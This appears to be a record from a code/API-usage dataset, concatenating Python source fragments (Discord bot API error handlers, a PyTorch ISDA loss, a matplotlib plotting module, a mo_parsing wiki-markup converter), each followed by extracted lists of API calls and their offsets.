"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel already exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
async def apiDiscordConfigsQuoteDisabledChannelNotExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel does not exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_not_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel does not exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel does not exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
| [
"json.dumps"
]
| [((1311, 1326), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (1321, 1326), False, 'import json\n'), ((2504, 2519), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (2514, 2519), False, 'import json\n')] |
import torch
import torch.nn as nn
class EstimatorCV():
def __init__(self, feature_num, class_num):
super(EstimatorCV, self).__init__()
self.class_num = class_num
self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda()
self.Ave = torch.zeros(class_num, feature_num)#.cuda()
self.Amount = torch.zeros(class_num)#.cuda()
def update_CV(self, features, labels):
N = features.size(0)
C = self.class_num
A = features.size(1)
NxCxFeatures = features.view(
N, 1, A
).expand(
N, C, A
)
onehot = torch.zeros(N, C)#.cuda()
onehot.scatter_(1, labels.view(-1, 1), 1)
NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A)
features_by_sort = NxCxFeatures.mul(NxCxA_onehot)
Amount_CxA = NxCxA_onehot.sum(0)
Amount_CxA[Amount_CxA == 0] = 1
ave_CxA = features_by_sort.sum(0) / Amount_CxA
var_temp = features_by_sort - \
ave_CxA.expand(N, C, A).mul(NxCxA_onehot)
var_temp = torch.bmm(
var_temp.permute(1, 2, 0),
var_temp.permute(1, 0, 2)
).div(Amount_CxA.view(C, A, 1).expand(C, A, A))
sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A)
sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A)
weight_CV = sum_weight_CV.div(
sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A)
)
weight_CV[weight_CV != weight_CV] = 0
weight_AV = sum_weight_AV.div(
sum_weight_AV + self.Amount.view(C, 1).expand(C, A)
)
weight_AV[weight_AV != weight_AV] = 0
additional_CV = weight_CV.mul(1 - weight_CV).mul(
torch.bmm(
(self.Ave - ave_CxA).view(C, A, 1),
(self.Ave - ave_CxA).view(C, 1, A)
)
)
self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp
.mul(weight_CV)).detach() + additional_CV.detach()
self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach()
self.Amount += onehot.sum(0)
class ISDALoss(nn.Module):
def __init__(self, feature_num, class_num):
super(ISDALoss, self).__init__()
self.estimator = EstimatorCV(feature_num, class_num)
self.class_num = class_num
self.cross_entropy = nn.CrossEntropyLoss()
def isda_aug(self, fc, features, y, labels, cv_matrix, ratio):
N = features.size(0)
C = self.class_num
A = features.size(1)
weight_m = list(fc.parameters())[0]
NxW_ij = weight_m.expand(N, C, A)
NxW_kj = torch.gather(NxW_ij,
1,
labels.view(N, 1, 1)
.expand(N, C, A))
CV_temp = cv_matrix[labels]
# sigma2 = ratio * \
# torch.bmm(torch.bmm(NxW_ij - NxW_kj,
# CV_temp).view(N * C, 1, A),
# (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C)
sigma2 = ratio * \
torch.bmm(torch.bmm(NxW_ij - NxW_kj,
CV_temp),
(NxW_ij - NxW_kj).permute(0, 2, 1))
sigma2 = sigma2.mul(torch.eye(C)#.cuda()
.expand(N, C, C)).sum(2).view(N, C)
aug_result = y + 0.5 * sigma2
return aug_result
def forward(self, model, fc, x, target_x, ratio):
features = model(x)
y = fc(features)
self.estimator.update_CV(features.detach(), target_x)
isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio)
loss = self.cross_entropy(isda_aug_y, target_x)
return loss, y
| [
"torch.bmm",
"torch.eye",
"torch.nn.CrossEntropyLoss",
"torch.zeros"
]
| [((211, 259), 'torch.zeros', 'torch.zeros', (['class_num', 'feature_num', 'feature_num'], {}), '(class_num, feature_num, feature_num)\n', (222, 259), False, 'import torch\n'), ((287, 322), 'torch.zeros', 'torch.zeros', (['class_num', 'feature_num'], {}), '(class_num, feature_num)\n', (298, 322), False, 'import torch\n'), ((353, 375), 'torch.zeros', 'torch.zeros', (['class_num'], {}), '(class_num)\n', (364, 375), False, 'import torch\n'), ((637, 654), 'torch.zeros', 'torch.zeros', (['N', 'C'], {}), '(N, C)\n', (648, 654), False, 'import torch\n'), ((2419, 2440), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (2438, 2440), True, 'import torch.nn as nn\n'), ((3176, 3211), 'torch.bmm', 'torch.bmm', (['(NxW_ij - NxW_kj)', 'CV_temp'], {}), '(NxW_ij - NxW_kj, CV_temp)\n', (3185, 3211), False, 'import torch\n'), ((3342, 3354), 'torch.eye', 'torch.eye', (['C'], {}), '(C)\n', (3351, 3354), False, 'import torch\n')] |
"""
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class MetaFigure:
"""A class which defines a figure object"""
def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs):
if not sim:
from .. import sim
self.sim = sim
self.kind = kind
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParamsDefault)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# Set up any subplots
if not subplots:
nrows = 1
ncols = 1
elif type(subplots) == int:
nrows = subplots
ncols = 1
elif type(subplots) == list:
nrows = subplots[0]
ncols = subplots[1]
# Create figure
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
if 'dpi' in kwargs:
dpi = kwargs['dpi']
else:
dpi = self.rcParams['figure.dpi']
if autosize:
maxplots = np.max([nrows, ncols])
figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize)
figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize)
figSize = [figSize0, figSize1]
self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi)
self.plotters = []
def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if not sim:
from .. import sim
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.kind
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
try:
self.fig.show(block=False)
except:
self.fig.show()
def addSuptitle(self, **kwargs):
self.fig.suptitle(**kwargs)
def finishFig(self, **kwargs):
if 'suptitle' in kwargs:
if kwargs['suptitle']:
self.addSuptitle(**kwargs['suptitle'])
if 'tightLayout' not in kwargs:
plt.tight_layout()
elif kwargs['tightLayout']:
plt.tight_layout()
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin,
"""
self.kind = kind
# Load data
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
if metafig:
self.metafig = metafig
# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
final = True
self.metafig = MetaFigure(kind=self.kind, **kwargs)
self.fig = self.metafig.fig
self.axis = self.metafig.ax
else:
self.fig = self.axis.figure
# Attach plotter to its MetaFigure
self.metafig.plotters.append(self)
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
if 'invert_yaxis' in kwargs:
if kwargs['invert_yaxis'] is True:
self.axis.invert_yaxis()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
# Check for and apply any legend parameters in the kwargs
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_new = kwargs['legendKwargs']
for key in legendKwargs_new:
if key in legendParams:
legendKwargs[key] = legendKwargs_new[key]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs)
def addColorbar(self, **kwargs):
plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs)
def finishAxis(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'dpi' in kwargs:
if kwargs['dpi']:
self.fig.set_dpi(kwargs['dpi'])
if 'figSize' in kwargs:
if kwargs['figSize']:
self.fig.set_size_inches(kwargs['figSize'])
if 'legend' in kwargs:
if kwargs['legend'] is True:
self.addLegend(**kwargs)
elif type(kwargs['legend']) == dict:
self.addLegend(**kwargs['legend'])
if 'scalebar' in kwargs:
if kwargs['scalebar'] is True:
self.addScalebar()
elif type(kwargs['scalebar']) == dict:
self.addScalebar(**kwargs['scalebar'])
if 'colorbar' in kwargs:
if kwargs['colorbar'] is True:
self.addColorbar()
elif type(kwargs['colorbar']) == dict:
self.addColorbar(**kwargs['colorbar'])
if 'grid' in kwargs:
self.axis.minorticks_on()
if kwargs['grid'] is True:
self.axis.grid()
elif type(kwargs['grid']) == dict:
self.axis.grid(**kwargs['grid'])
# If this is the only axis on the figure, finish the figure
if type(self.metafig.ax) != list:
self.metafig.finishFig(**kwargs)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.metafig.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishAxis(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for plotting one line per subplot"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishAxis(**kwargs)
return self.fig
class LinesPlotter(GeneralPlotter):
"""A class used for plotting multiple lines on the same axis"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'lines'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
self.label = data.get('label')
def plot(self, **kwargs):
numLines = len(self.y)
if type(self.color) != list:
colors = [self.color for line in range(numLines)]
else:
colors = self.color
if type(self.marker) != list:
markers = [self.marker for line in range(numLines)]
else:
markers = self.marker
if type(self.markersize) != list:
markersizes = [self.markersize for line in range(numLines)]
else:
markersizes = self.markersize
if type(self.linewidth) != list:
linewidths = [self.linewidth for line in range(numLines)]
else:
linewidths = self.linewidth
if type(self.alpha) != list:
alphas = [self.alpha for line in range(numLines)]
else:
alphas = self.alpha
if self.label is None:
labels = [None for line in range(numLines)]
else:
labels = self.label
for index, line in enumerate(self.y):
self.axis.plot(
self.x,
self.y[index],
color=colors[index],
marker=markers[index],
markersize=markersizes[index],
linewidth=linewidths[index],
alpha=alphas[index],
label=labels[index],
)
self.finishAxis(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class ImagePlotter(GeneralPlotter):
"""A class used for image plotting using plt.imshow"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'image'
self.X = data.get('X')
self.cmap = data.get('cmap', None)
self.norm = data.get('norm', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.alpha = data.get('alpha', None)
self.vmin = data.get('vmin', None)
self.vmax = data.get('vmax', None)
self.origin = data.get('origin', None)
self.extent = data.get('extent', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.filternorm = data.get('filternorm', True)
self.filterrad = data.get('filterrad', 4.0)
self.resample = data.get('resample', None)
self.url = data.get('url', None)
self.data = data.get('data', None)
def plot(self, **kwargs):
imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class AnchoredScaleBar(AnchoredOffsetbox):
"""
A class used for adding scale bars to plots
"""
def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs):
"""
Draw a horizontal and/or vertical bar with the size in data coordinate
of the give axes. A label will be drawn underneath (center-aligned).
- transform : the coordinate frame (typically axes.transData)
- sizex,sizey : width of x,y bar, in data units. 0 to omit
- labelx,labely : labels for x,y bars; None to omit
- loc : position in containing axes
- pad, borderpad : padding, in fraction of the legend font size (or prop)
- sep : separation between labels and bars in points.
- **kwargs : additional arguments passed to base class constructor
"""
from matplotlib.patches import Rectangle
from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea
bars = AuxTransformBox(axis.transData)
if sizex:
if axis.xaxis_inverted():
sizex = -sizex
bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none"))
if sizey:
if axis.yaxis_inverted():
sizey = -sizey
bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none"))
if sizex and labelx:
self.xlabel = TextArea(labelx)
bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep)
if sizey and labely:
self.ylabel = TextArea(labely)
bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs)
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
def get_tick_size(subaxis):
tick_size = None
tick_locs = subaxis.get_majorticklocs()
if len(tick_locs)>1:
tick_size = np.abs(tick_locs[1] - tick_locs[0])
return tick_size
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
def autosize(value, maxvalue, scale, n=1, m=10):
round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m
while value > maxvalue:
try:
value = round_to_n(0.8 * maxvalue * scale, n, m) / scale
except:
value /= 10.0
m /= 10.0
return value
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
| [
"numpy.abs",
"matplotlib.offsetbox.VPacker",
"matplotlib.patches.Rectangle",
"matplotlib.offsetbox.AuxTransformBox",
"os.path.join",
"numpy.max",
"os.path.isfile",
"matplotlib.pyplot.close",
"matplotlib.offsetbox.TextArea",
"matplotlib.offsetbox.AnchoredOffsetbox.__init__",
"matplotlib.style.use",
"matplotlib.offsetbox.HPacker",
"matplotlib.pyplot.tight_layout",
"copy.deepcopy",
"matplotlib.pyplot.subplots"
]
| [((970, 999), 'copy.deepcopy', 'deepcopy', (['mpl.rcParamsDefault'], {}), '(mpl.rcParamsDefault)\n', (978, 999), False, 'from copy import deepcopy\n'), ((2219, 2271), 'matplotlib.pyplot.subplots', 'plt.subplots', (['nrows', 'ncols'], {'figsize': 'figSize', 'dpi': 'dpi'}), '(nrows, ncols, figsize=figSize, dpi=dpi)\n', (2231, 2271), True, 'import matplotlib.pyplot as plt\n'), ((5283, 5316), 'matplotlib.style.use', 'mpl.style.use', (['self.orig_rcParams'], {}), '(self.orig_rcParams)\n', (5296, 5316), True, 'import matplotlib as mpl\n'), ((11099, 11140), 'matplotlib.style.use', 'mpl.style.use', (['self.metafig.orig_rcParams'], {}), '(self.metafig.orig_rcParams)\n', (11112, 11140), True, 'import matplotlib as mpl\n'), ((19358, 19389), 'matplotlib.offsetbox.AuxTransformBox', 'AuxTransformBox', (['axis.transData'], {}), '(axis.transData)\n', (19373, 19389), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((20082, 20202), 'matplotlib.offsetbox.AnchoredOffsetbox.__init__', 'AnchoredOffsetbox.__init__', (['self', 'loc'], {'pad': 'pad', 'borderpad': 'borderpad', 'child': 'bars', 'prop': 'prop', 'frameon': '(False)'}), '(self, loc, pad=pad, borderpad=borderpad, child=\n bars, prop=prop, frameon=False, **kwargs)\n', (20108, 20202), False, 'from matplotlib.offsetbox import AnchoredOffsetbox\n'), ((1982, 2004), 'numpy.max', 'np.max', (['[nrows, ncols]'], {}), '([nrows, ncols])\n', (1988, 2004), True, 'import numpy as np\n'), ((3749, 3780), 'os.path.join', 'os.path.join', (['fileDir', 'fileName'], {}), '(fileDir, fileName)\n', (3761, 3780), False, 'import os\n'), ((3826, 3850), 'os.path.isfile', 'os.path.isfile', (['fileName'], {}), '(fileName)\n', (3840, 3850), False, 'import os\n'), ((4852, 4870), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4868, 4870), True, 'import matplotlib.pyplot as plt\n'), ((5187, 5206), 'matplotlib.pyplot.close', 'plt.close', (['self.fig'], {}), '(self.fig)\n', (5196, 5206), True, 'import matplotlib.pyplot as plt\n'), ((5885, 5905), 'os.path.isfile', 'os.path.isfile', (['data'], {}), '(data)\n', (5899, 5905), False, 'import os\n'), ((19806, 19822), 'matplotlib.offsetbox.TextArea', 'TextArea', (['labelx'], {}), '(labelx)\n', (19814, 19822), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((19842, 19911), 'matplotlib.offsetbox.VPacker', 'VPacker', ([], {'children': '[bars, self.xlabel]', 'align': '"""center"""', 'pad': '(0)', 'sep': 'sep'}), "(children=[bars, self.xlabel], align='center', pad=0, sep=sep)\n", (19849, 19911), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((19967, 19983), 'matplotlib.offsetbox.TextArea', 'TextArea', (['labely'], {}), '(labely)\n', (19975, 19983), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((20003, 20072), 'matplotlib.offsetbox.HPacker', 'HPacker', ([], {'children': '[self.ylabel, bars]', 'align': '"""center"""', 'pad': '(0)', 'sep': 'sep'}), "(children=[self.ylabel, bars], align='center', pad=0, sep=sep)\n", (20010, 20072), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((21024, 21059), 'numpy.abs', 'np.abs', (['(tick_locs[1] - tick_locs[0])'], {}), '(tick_locs[1] - tick_locs[0])\n', (21030, 21059), True, 'import numpy as np\n'), ((4919, 4937), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4935, 4937), True, 'import matplotlib.pyplot as plt\n'), ((19505, 19569), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', 'sizex', '(0)'], {'ec': 'barcolor', 'lw': 'barwidth', 'fc': '"""none"""'}), "((0, 0), sizex, 0, ec=barcolor, lw=barwidth, fc='none')\n", (19514, 19569), False, 'from matplotlib.patches import Rectangle\n'), ((19685, 19749), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', '(0)', 'sizey'], {'ec': 'barcolor', 'lw': 'barwidth', 'fc': '"""none"""'}), "((0, 0), 0, sizey, ec=barcolor, lw=barwidth, fc='none')\n", (19694, 19749), False, 'from matplotlib.patches import Rectangle\n')] |
from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
def convertToHTML(opening, closing):
def conversionParseAction(t, l, s):
return opening + t[0] + closing
return conversionParseAction
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
def convertToHTML_A(t, l, s):
try:
text, url = t[0].split("->")
except ValueError:
raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
return '<A href="{}">{}</A>'.format(url, text)
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
| [
"mo_parsing.helpers.QuotedString"
]
